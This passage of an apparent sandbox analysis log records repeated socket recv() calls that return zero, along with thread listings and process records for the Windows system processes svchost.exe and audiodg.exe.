buf=0x27e3a0) returned 0 [0226.792] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.792] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.792] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.792] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.792] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.792] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.793] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.793] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.793] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.793] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.793] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.793] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.793] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.793] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.793] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.793] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.793] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.793] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.793] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.793] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.793] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.793] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.793] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.793] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.793] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.794] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.794] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.794] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.794] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.794] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.794] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.794] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.794] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.794] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.794] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.794] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.794] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.794] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.794] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.794] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.794] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.794] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.794] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.794] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.795] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.795] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.795] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.795] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.795] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.795] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.795] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.795] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.795] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.795] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.795] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.795] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.795] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.795] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.795] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.795] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.795] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.795] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.795] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.795] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.795] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.795] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.796] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.796] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.796] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.796] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.796] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.796] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.796] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.796] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.796] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.796] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.796] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.796] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.796] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.796] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.796] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.796] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.796] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.796] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.796] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.796] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.796] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.796] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.797] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.797] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.797] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.797] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.797] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.797] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.797] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.797] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.797] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 [0226.797] recv (in: s=0x434, buf=0x27e3a0, len=2, flags=0 | out: buf=0x27e3a0) returned 0 Thread: id = 81 os_tid = 0xb30 Thread: id = 82 os_tid = 0xb34 Thread: id = 83 os_tid = 0xb38 Thread: id = 84 os_tid = 0xb3c Thread: id = 85 os_tid = 0xb40 Thread: id = 86 os_tid = 0xb44 Thread: id = 144 os_tid = 0xa2c Process: id = "6" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x6de7000" os_pid = "0x2bc" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x1c8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b704" [0xc000000f], "LOCAL" [0x7] Thread: id = 87 os_tid = 0xff8 Thread: id = 88 os_tid = 0x870 Thread: id = 89 os_tid = 0x868 Thread: id = 90 os_tid = 0x830 Thread: id = 91 os_tid = 0x758 Thread: id = 92 os_tid = 0x6f0 Thread: id = 93 os_tid = 0x33c Thread: id = 94 os_tid = 0x4f0 Thread: id = 95 os_tid = 0x5e0 Thread: id = 96 os_tid = 0x5dc Thread: id = 97 os_tid = 0x5d4 Thread: id = 98 os_tid = 0x560 Thread: id = 99 os_tid = 0x2a8 Thread: id = 100 os_tid = 0x1d4 Thread: id = 101 os_tid = 0x3b4 Thread: id = 102 os_tid = 0x3ac Thread: id = 103 os_tid = 0x39c Thread: id = 104 os_tid = 0x2f4 Thread: id = 105 os_tid = 0x2f0 Thread: id = 106 os_tid = 0x2cc Thread: id = 107 os_tid = 0x2c0 Thread: id = 111 os_tid = 0xb88 Thread: id = 112 os_tid = 0xb68 Thread: id = 113 os_tid = 0xb08 Thread: id = 118 os_tid = 0xdf0 Thread: id = 131 os_tid = 0xe08 Thread: id = 135 os_tid = 0xf10 Process: id = "7" image_name = "audiodg.exe" filename = "c:\\windows\\system32\\audiodg.exe" page_root = "0x27ba3000" os_pid = "0xeac" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x2bc" cmd_line = "C:\\Windows\\system32\\AUDIODG.EXE 0x60c" cur_dir = "C:\\Windows" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xe], "NT SERVICE\\Dhcp" [0xe], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xe], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000b704" [0xc000000f], "LOCAL" [0x7] Thread: id = 124 os_tid = 0xe74 Thread: id = 126 os_tid = 0xe70 Thread: id = 127 os_tid = 0xe10 Thread: id = 128 os_tid = 0xef8 Thread: id = 129 os_tid = 0xdf8 Thread: id = 130 os_tid = 0xe04 Thread: id = 134 os_tid = 0xde4 Thread: id = 136 os_tid = 0xd28 Thread: id = 138 os_tid = 0x5fc Thread: id = 139 os_tid = 0x6cc Thread: id = 140 os_tid = 0x890